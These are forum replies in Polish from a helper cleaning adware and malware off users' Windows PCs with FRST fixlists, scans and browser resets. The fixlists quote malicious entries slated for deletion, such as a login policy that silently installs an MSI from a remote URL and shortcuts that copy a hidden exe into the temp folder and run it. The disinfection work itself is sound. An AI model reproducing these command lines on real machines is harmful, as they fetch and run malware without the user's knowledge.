Miszel03

Raporty FRST zostały wygenerowane na złych ustawieniach. Do generacji raportów na naszym forum, proszę używać naszej instrukcji: KLIK. Jaka to był infekcja? Jak to została usunięte tylko częściowo? Wyjaśnij to jakoś bardziej proszę

System jest kolosalnie zainfekowany przez infekcje typu adware / PUP. Cześć infekcji usuwam automatycznie skryptem, bo jest to w całości możliwe. Instalacji Tencent nie ruszam, spróbujesz przez plik deinstalacyjny i przez AdwCleaner. Twój opis sytuacji pokrywa się z tym co ja widzę w systemie. Do poczytania: KLIK. 1. Przez panel sterowania odinstaluj: Adware / PUP: AppHelper. Przestarzałe programy: Spybot - Search & Destroy. Następnie przejdź do poniższych folderów i przeszukaj je w poszukiwaniu pliku deinstalacyjnego (nazwa zbliżona do uninstall.exe). Jeśli go znajdziesz to go uruchom, jeśli nie to przejdź dalej. C:\Program Files (x86)\Tencent C:\Program Files (x86)\UCBrowser 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: Task: {0F12A525-C545-4C19-AC6F-CD86747AEF5D} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku Task: {3460D9AB-E5DC-4374-9E7C-E4EE551E4DC1} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku Task: {4D8E05AB-D346-435B-9409-657E345D75BB} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> Brak pliku Task: {770AEBE0-6566-4DA8-B217-5B2DABB7BB33} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku Task: {79784B90-92DA-4BE8-8BE8-485A25BC1E58} - \McAfee\McAfee Idle Detection Task -> Brak pliku Task: {948C6EA4-0401-44C4-9C40-F72AB6386D34} - \WPD\SqmUpload_S-1-5-21-2280503538-1542354952-1058851140-1001 -> Brak pliku Task: {D29C3BF5-4571-41B1-8F0C-C3291C0991AC} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku Task: {D5C9F630-ECCB-4AE9-8B24-3DCF047E2117} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku Task: {D68810D6-E38C-4515-A204-E40007CF450A} - System32\Tasks\UCBrowserUpdater => C:\Program Files (x86)\UCBrowser\Application\update_task.exe Task: C:\WINDOWS\Tasks\UCBrowserUpdater.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe Task: {CF9756B8-FC27-48D4-B66E-4F1EC3F88BA2} - System32\Tasks\Priientpruretain Debuger => C:\Program Files (x86)\Drerrationphuceck\xdroverph.exe [2017-04-23] (Google Inc.) C:\Program Files (x86)\Drerrationphuceck RemoveDirectory: C:\Program Files (x86)\UCBrowser WMI_ActiveScriptEventConsumer_ASEC: ShortcutWithArgument: C:\Users\Michał\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\MICHA~1\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/ ShortcutWithArgument: C:\Users\Michał\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://qtipr.com/ ShortcutWithArgument: C:\Users\Michał\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9\user0 - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=ChromeDefaultData ShortcutWithArgument: C:\Users\Michał\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\276bc18f565c8259\Michal - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=chagulybuvertainmibile ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\MICHA~1\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/ ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\MICHA~1\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/ RemoveDirectory: C:\Users\MICHA~1\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk AlternateDataStreams: C:\ProgramData\TEMP:6BE50C2B [464] AlternateDataStreams: C:\ProgramData\TEMP:A1454082 [640] AlternateDataStreams: C:\ProgramData\TEMP:E25BED53 [634] HKLM-x32\...\Run: [WindowsDefender] => - Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X] HKLM-x32\...\Run: [accelerator] => C:\Users\MICHA~1\AppData\Local\Temp\accelerator.exe [2419200 2017-04-23] () Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X] HKU\S-1-5-21-2280503538-1542354952-1058851140-1001\...\Run: [Windows Defender] => - HKU\S-1-5-21-2280503538-1542354952-1058851140-1001\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 HKLM\...\Providers\tiwgrh1k: C:\Program Files (x86)\Priientpruretain Debuger\local64spl.dll [311296 2017-04-23] () C:\Program Files (x86)\Priientpruretain Debuger ShellExecuteHooks: Brak nazwy - {AEEED482-2355-11E7-811E-64006A5CFC23} - C:\Users\Michał\AppData\Roaming\Grawule\Shugerchmavesy.dll -> Brak pliku ShellExecuteHooks: Brak nazwy - {5F51FFFE-7463-4220-B711-E5B9ACB8EDFE} - C:\ProgramData\igfxDH.dll -> Brak pliku GroupPolicy: Ograniczenia GroupPolicyScripts: Ograniczenia SearchScopes: HKU\S-1-5-21-2280503538-1542354952-1058851140-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = U3 aswbdisk; Brak ImagePath R3 TAOAccelerator; \??\C:\WINDOWS\system32\Drivers\TAOAccelerator64.sys [X] 2017-04-23 13:00 - 2017-04-23 13:00 - 00000000 ____D C:\Users\Michał\AppData\Local\UCBrowser C:\Users\Michał\Documents\Euro Truck Simulator 2\readme.rtf.lnk C:\Users\Michał\Desktop\Gry\Mafia II.lnk C:\Users\Michał\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Pełne czyszczenie śmieci.lnk DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Michał\AppData\Local\Mozilla C:\Users\Michał\AppData\Roaming\Mozilla C:\Users\Michał\AppData\Roaming\Profiles Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Otwórz Google Chrome następnie: Ustawienia > karta Ustawienia > Osoby > Dodaj Osobę > Załóż czysty profil > ponownie wejdź do sekcji Osoby i skasuj wszystkie stare profile. Na nowym profilu polecam zainstalować rozszerzenie uBlock Origin blokujące reklamy o podłożu nieinfekcyjnym. 4. Pomimo wcześniejszych akcji pobierz AdwCleaner uruchom go i kliknij Skanuj, a gdy uruchomi się przycisk Oczyść kliknij go. Raport zaprezentuj na forum. 5. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 6. Zrób nowy log FRST z opcji Skanuj (Scan), wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

To z mojej winy, bo za leczenie systemów odpowiedzialny jest ja. Przepraszam, czekam tylko na raporty i przechodzę do pracy. Temat został przeniesiony do priorytetów jak mówi Rucek.

Temat przenoszę do działu Hardware, ponieważ problem z komputerem (a raczej w tym przypadku z systemem) nie jest związany z infekcją. Skoro twierdzisz, że procesor ulega grzaniu się to masz kutemu podstawy - dlatego temat ląduje w Hardware. Groszek wrócił z Czech więc pewnie się zajmie Twoim tematem Pamiętaj, o danych, o których przypomina moderator Rucek - bez nich moderator działu Hardware nie przystąpi do pomocy.

W raportach brak oznak infekcji. Wyczyścimy i zabezpieczymy przeglądarkę (ten szczep szkodnika siedzi w cache przeglądarek) oraz przeprowadzimy kompleksowy skan antywirusowy. System sprzątam, kasuję reszki po programach (głównie po przeglądarce Mozilla FireFox oraz po wątpliwym narzędziu WinThruster). Resetuje bufor rozpoznawania nazwa DNS oraz pliki tymczasowe. 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: U3 kfxdruog; C:\Users\madzi\AppData\Local\Temp\kfxdruog.sys [56584 2017-04-20] (GMER) [brak podpisu cyfrowego] CustomCLSID: HKU\S-1-5-21-1144632927-1327416135-3559468636-1002_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\madzi\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-1144632927-1327416135-3559468636-1002_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\madzi\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => Brak pliku Task: {B0ED5DC3-93F6-4B52-92D7-BC85E672C738} - System32\Tasks\WinThruster64-madzi-Notification => C:\Program Files\Solvusoft\WinThruster\Sync.exe Task: C:\Windows\Tasks\WinThruster64-madzi-Notification.job => C:\Program Files\Solvusoft\WinThruster\Sync.exe C:\ProgramData\{4B36989F-BE86-4A21-94B1-AC154A69EA65}\WinThrusterSetup.lnk DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\madzi\AppData\Local\Mozilla C:\Users\madzi\AppData\Roaming\Mozilla C:\Users\madzi\AppData\Roaming\Profiles CMD: ipconfig /flushdns EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Upewnij się, że AdwCleaner już niczego nie wykrywa. Jeśli wykrywa to wszystkie detekcje możesz dać do kasacji, skan powtarzaj do wyniku zero infekcji. 3. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 4. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie inne nieznane i niepotrzebne Ci rozszerzenia Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin 5. Zrób nowy log FRST z opcji Skanuj (Scan) już bez Addition i Shortcut. Dołącz też plik fixlog.txt.

Program dawno nie jest aktualizowany. Ostatnia aktualizacja przypada na marzec ubiegłego roku. W końcu najnowsze Ransomy to obejdą. Kopie zapasowe...kopie zapasowe. Kiedy się nauczycie? Nic Wam nie da większej pewności. Darmowa usługa Google Dysk / dysk zewnętrzny i po sprawie.

Do kasacji tylko ciasteczka. Detekcja FRST to fałszywy alarm. Czekam na raporty z drugiego komputera, a co do GMER'a to czasem zdarzają się z nim kolizje. Jeszcze jedno pytanie: czy zostawiałeś urządzenie bez opieki z obcą osobą, nawet kolegą (musiał fizycznie mieć dostęp do urządzenia)? Jest możliwość, że ktoś zainstalował oprogramowanie szpiegowskie, kupione w specjalistycznym sklepie. Tego typu oprogramowania bez bardzo szerokiego dostępu nie wykryje i antywirusy też mogą mieć z tym problem. Co do pytania o KeyLoggera to tak, może być w MBR lub zainstalowany sprzętowo (np. w klawiaturze dołączony) ale to bardzo mało prawdopodobne.

W raportach brak oznak infekcji, co oznacza, że system na laptopie jest czysty. Zresztą chroni Cię też porządny antywirus ESET. Na wszelki wypadek jednak przeskanuj system za pomocą HitmanPro. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. W szkołach systemy powinny być skonfigurowane protekcyjnie, tak, aby po zamknięciu przeglądarki bądź komputera, a nawet upływie danego czasu wylogowywanie nastąpiło automatycznie. Jeśli tak nie jest to...szkoda gadać. Proszę wykonać poniższe kroki zabezpieczające na obu kontach Facebook. 1. Przejdź do ustawień dot. aplikacji mających dostęp do Twojego konta, a następnie usuń wszystkie, te których nie znasz lub nie korzystasz. Zaznaczę jeszcze, że nawet jeśli korzystasz to zweryfikuj ich popularność. 2. Opuść wszystkie nieznane Ci grupy, do których należysz i przy opuszczaniu zaznacz opcję Zablokuj użytkownikom dodanie mnie do tej grupy. 3. Jeszcze raz zmień hasła do portalu na trudne do złamania. Uwzględnij małe, wielkie litery, cyfry, a nawet znaki specjalnie. Przykładowo, jeśli lubisz lody to hasło możesz ustawić: Mich@lLubiL()dy. Schemat jest prosty ze znaków specjalnych tworzysz litery, a każdy wyraz jest z wielkie litery na początku. 4. Aktywuj etap weryfikacji dwuetapowej, procedurę znasz, bo na jednym koncie już masz. Zamiast tego możesz również obczaić opcję Zatwierdzanie logowania. 5. Zaloguj się do konta Facebook i kompleksowo wyloguj się ze wszystkich urządzeń, na których sesja jest aktywna. Na Stronie głównej obok opcji Szybka pomoc kliknij strzałkę w dół, a następnie kliknij zakładkę Ustawienia. W Ustawieniach wybierz zakładkę Bezpieczeństwo, w której przejdź do sekcji Miejsca logowania, z której usuń wszystkie sesje logowania. Ten proces wyloguję Cię ze wszystkich urządzeń globalnie. Jeśli chodzi zaś o email to wyloguj się ze wszystkich aktywnych sesji (podobnie jak na Facebooku), nie wiem czy masz taką opcję, ale ja na GMailu taką mam. Zmień również hasła. Jeśli nie będzie to dla Ciebie uciążliwe to włącz również weryfikację dwuetapową jeśli Twoja poczta takową oferuję. Jeśli masz ubezpieczone konto w banku (a raczej masz, bo banki teraz nawet tego powoli zaczynają wymagać) to dramatu nie ma, bo zgłosisz popełnienie przestępstwa na policji* i bank zwróci Ci pieniądze. * - moja mam często pada kradzieżą (skimery w bankomatach) i za każdym razem, aby odzyskać pieniądze musi zgłosić sprawę na policji. Taki warunek stawia większość banków. Włącz w logowaniu funkcję tzw. maskowanego hasła i SMSKodu przy przelewie jeśli Twój bank nie ma tego w standardach. A jeśli w ogóle nie ma to zastanowiłbym się nad zmianą banku.

W systemie grasuję infekcja uruchamiająca podejrzaną stronę oraz przeglądarki. Ponad to prawdopodobnie założyła blokady typu Debugger. Nie widzę nic związanego z fałszywym FireFox - nie masz takiego zainstalowanego, a już na pewno nie masz zainstalowanej przeglądarki Mozilla FireFox. 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKLM-x32\...\Run: [] => [X] HKU\S-1-5-21-1985022496-2657986825-1099666431-1000\...\Run: [GoogleChromeAutoLaunch_BE1F6EBAA18EC437B3D3D19AFF8C38DD] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [1111896 2017-03-29] (Google Inc.) HKU\S-1-5-21-1985022496-2657986825-1099666431-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj81NjMxFdM5MTY1NWF3OWF1OWH1FjYyNdzXF8M1RUNXMq== /q IFEO\taskmgr.exe: [Debugger] S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X] S3 VGPU; System32\drivers\rdvgkmd.sys [X] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Problem Report Wizard\Run AMD Problem Report Wizard.lnk DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Szymon\AppData\Local\Mozilla C:\Users\Szymon\AppData\Roaming\Mozilla C:\Users\Szymon\AppData\Roaming\Profiles EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 3. Zrób nowy zestaw raportów FRST i GMER. Dołącz też plik Fixlog.

Pomijam brak raportu GMER. W raportach brak oznak infekcji pomijając jakąś dziwną instalację, której się pozbędziesz. Jeśli zaś chodzi o wejście Jack to temat przenosie do działu Hardware, skąd poczekasz na pomoc z tym związaną. 1. Popatrz na poniższe wyniki. World of Tanks (HKU\S-1-5-21-1693114668-2537149228-3336235061-1001\...\{1EAC1D02-C6AC-4FA6-9A44-96258C37C812eu}_is1) (Version: - Wargaming.net) WorldofTanks (HKLM-x32\...\WorldofTanks) (Version: - ) Na zielono program bez obiekcji, poprawny, a na czerwono z obiekcjami, podejrzany. Generalnie ta druga instalacja jest jakaś podejrzana i niecertyfikowana. Wygląda to na jakąś fałszywkę. Odinstaluj. 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-1693114668-2537149228-3336235061-1001\...\Policies\Explorer: [NolowDiskSpaceChecks] 1 ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia ShortcutWithArgument: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WorldofTanks\WorldofTanks.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --app=hxxp://go.playmmogames.com/aff_c?offer_id=174&aff_id=1034 --start-fullscreen ShortcutWithArgument: C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\WorldofTanks.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --app=hxxp://go.playmmogames.com/aff_c?offer_id=174&aff_id=1034 --start-fullscreen Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Nie musisz dostarczać nowych logów, ani raportu wynikowego (pliku Fixlogl). Ze strony tego działu to na tyle.

Masz tylko, że ja nie ściągnąłem z niego atrybuty ukrywającego. Przepraszam za błąd, jak dostarczysz raporty to przejdziemy dalej. Co do pliku Fixlog to część się wykonała, a część nie i szczerze mówiąc nie wiem co było przyczyną potknięcia się FRST. Widać również, że AdwClener znalazł jeszcze dodatkowe śmiecie. Zrób nowy zestaw raportów FRST, bo nie wiem na czym aktualnie stoimy.

To związane z jakąś instalką, ale jeśli po jej uruchomieniu w przeszłości żadne problemy nie wystąpiły, to wydaję mi się, że AV czepia się pochodzenia, czyli Asystenta Pobierania. Pliki do przeniesienia, rób teraz wszystko bezpiecznie i rób kopie danych. Obserwuj jeśli infekcja by powróciła zgłoś się. Powodzenia w pracy magisterskiej!

Brakuje trzeciego obowiązkowego raportu Shortcut genrowanego przez FRST - dołącz go.

Sytuacja diametralnie się zmieniła. W systemie żadnych śladów infekcji. Z poprzedniej diagnostyki do kasacji tylko poniższe klucze rejestru. Zrobimy to z innego środowiska. 1. Start narzędzia komend. Kliknij jednocześnie klawisz oraz R. Uruchomi się narzędzie Uruchamianie. W polu ścieżek wpisz CMD.EXE i kliknij klawisz ENTER. Uruchomi się okno konsoli komend. 2. Użycie komend.Do okna konsoli komend wklej: reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Birdjobsc" /f reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Birdjob" /f reg delete "HKEY_USERS\S-1-5-21-642869367-1592473142-3323770084-1000\Software\Birdjob" /f a następnie kliknij ENTER.Powiedz czy się powiodło i jakie jeszcze występują problemy.

W BitDefender kliknij w View Files i pokaż mi konkretnie okno. Co do Windows Defender - to pewnie w instalce było adware, - do kasacji.

Żebyś przypadkiem nie używał przywracania systemu - bo dojdzie do reinfekcji. Dopiero jak wszystkie punkty zostaną skasowane (kwestia kilku sekund w finalizacji tematu). 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: U3 pxldrpob; \??\C:\Users\Piotr\AppData\Local\Temp\pxldrpob.sys [X] C:\Windows\4FC9DA9DF608454E8191D7EFFDCC5726.TMP C:\Users\Piotr\AppData\Roaming\3432998970 C:\Users\Piotr\AppData\Local\Temp\9c1d450fa901b4fa27.exe ShortcutWithArgument: C:\Users\Piotr\Desktop\Moje Dokumenty.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> /c start explorer.exe "Moje Dokumenty" & type "9c1d450fa901b4fa27.exe" > "%temp%\9c1d450fa901b4fa27.exe" && "%temp%\9c1d450fa901b4fa27.exe" ShortcutWithArgument: C:\Users\Piotr\Desktop\Trial-Reset 4.0 Final Fixed.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> /c start explorer.exe "Trial-Reset 4.0 Final Fixed" & type "9c1d450fa901b4fa27.exe" > "%temp%\9c1d450fa901b4fa27.exe" && "%temp%\9c1d450fa901b4fa27.exe" ShortcutWithArgument: C:\Users\Piotr\Desktop\Śmieci.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> /c start explorer.exe "Śmieci" & type "9c1d450fa901b4fa27.exe" > "%temp%\9c1d450fa901b4fa27.exe" && "%temp%\9c1d450fa901b4fa27.exe" C:\Users\Piotr\Links\Nowy folder.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Zapuść skan całego systemu za pomocą BitDefendera, a po nim przeskanuj jeszcze osobno (poprzez opcję skanuj wybrane pliki czy folder) pliki, które są zaszyfrowane i niezaszyfrowane i dopiero wtedy (jeśli będą czyste) możesz je przenieść na inny dysk. Jeśli coś wykryje to dostarcz raport.

W systemie widać adware, które masowo podmieniło wyszukiwarki w przeglądarkach, do tego widać infekcji WMI integrującą w skróty. Twój opis pokrywa się z sytuacją, która ja widzę w systemie. Do poczytania: KLIK. 1. Przez panel sterowania odinstaluj: Adware / PUP: Online Special Application. 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1 ShellExecuteHooks: Brak nazwy - {5F51FFFE-7463-4220-B711-E5B9ACB8EDFE} - C:\ProgramData\igfxDH.dll -> Brak pliku ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1492589291&z=0919894df89a5868cdab4fcg6z5t2o2web4teo6t6o&from=che0812&uid=SAMSUNGXHD502IJ_S13TJ1CQ405793 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1492589291&z=0919894df89a5868cdab4fcg6z5t2o2web4teo6t6o&from=che0812&uid=SAMSUNGXHD502IJ_S13TJ1CQ405793 HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492589291&z=0919894df89a5868cdab4fcg6z5t2o2web4teo6t6o&from=che0812&uid=SAMSUNGXHD502IJ_S13TJ1CQ405793&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492589291&z=0919894df89a5868cdab4fcg6z5t2o2web4teo6t6o&from=che0812&uid=SAMSUNGXHD502IJ_S13TJ1CQ405793&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492589291&z=0919894df89a5868cdab4fcg6z5t2o2web4teo6t6o&from=che0812&uid=SAMSUNGXHD502IJ_S13TJ1CQ405793 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492589291&z=0919894df89a5868cdab4fcg6z5t2o2web4teo6t6o&from=che0812&uid=SAMSUNGXHD502IJ_S13TJ1CQ405793 HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492589291&z=0919894df89a5868cdab4fcg6z5t2o2web4teo6t6o&from=che0812&uid=SAMSUNGXHD502IJ_S13TJ1CQ405793&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492589291&z=0919894df89a5868cdab4fcg6z5t2o2web4teo6t6o&from=che0812&uid=SAMSUNGXHD502IJ_S13TJ1CQ405793&q={searchTerms} HKU\S-1-5-21-2928031591-3755042668-476525210-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492589291&z=0919894df89a5868cdab4fcg6z5t2o2web4teo6t6o&from=che0812&uid=SAMSUNGXHD502IJ_S13TJ1CQ405793&q={searchTerms} HKU\S-1-5-21-2928031591-3755042668-476525210-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1492589291&z=0919894df89a5868cdab4fcg6z5t2o2web4teo6t6o&from=che0812&uid=SAMSUNGXHD502IJ_S13TJ1CQ405793 HKU\S-1-5-21-2928031591-3755042668-476525210-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp HKU\S-1-5-21-2928031591-3755042668-476525210-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492589291&z=0919894df89a5868cdab4fcg6z5t2o2web4teo6t6o&from=che0812&uid=SAMSUNGXHD502IJ_S13TJ1CQ405793 HKU\S-1-5-21-2928031591-3755042668-476525210-1001\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492589291&z=0919894df89a5868cdab4fcg6z5t2o2web4teo6t6o&from=che0812&uid=SAMSUNGXHD502IJ_S13TJ1CQ405793&q={searchTerms} HKU\S-1-5-21-2928031591-3755042668-476525210-1003\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccYu7AylGRx230evXqe-RyAwF_kPZKwEXN9fTzUSlVGaTaWCoCYd0Pybhz0KeX7gDkv6-frGp38HMMGrpS7em1VouLnp4nKOfMTmsSN2LFrsc9Y4lu2dDbsJbvF4pvo2xUkZZ3CR_5h1NEQ-0mICnQBOLzhwVw,, HKU\S-1-5-21-2928031591-3755042668-476525210-1003\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccYu7AylGRx230evXqe-RyAwF_kPZKwEXN9fTzUSlVGaTaWCoCYd0Pybhz0KeX7gDkv2txfhHl14xn80Rfm5mX0F4_HCTTpKydPB4jxA5kdPPBZfu4Un-Ss_rssgJZJ49rvAmrvlnDy_xnSyEEBXY4YeCxTYWQ,,&q={searchTerms} SearchScopes: 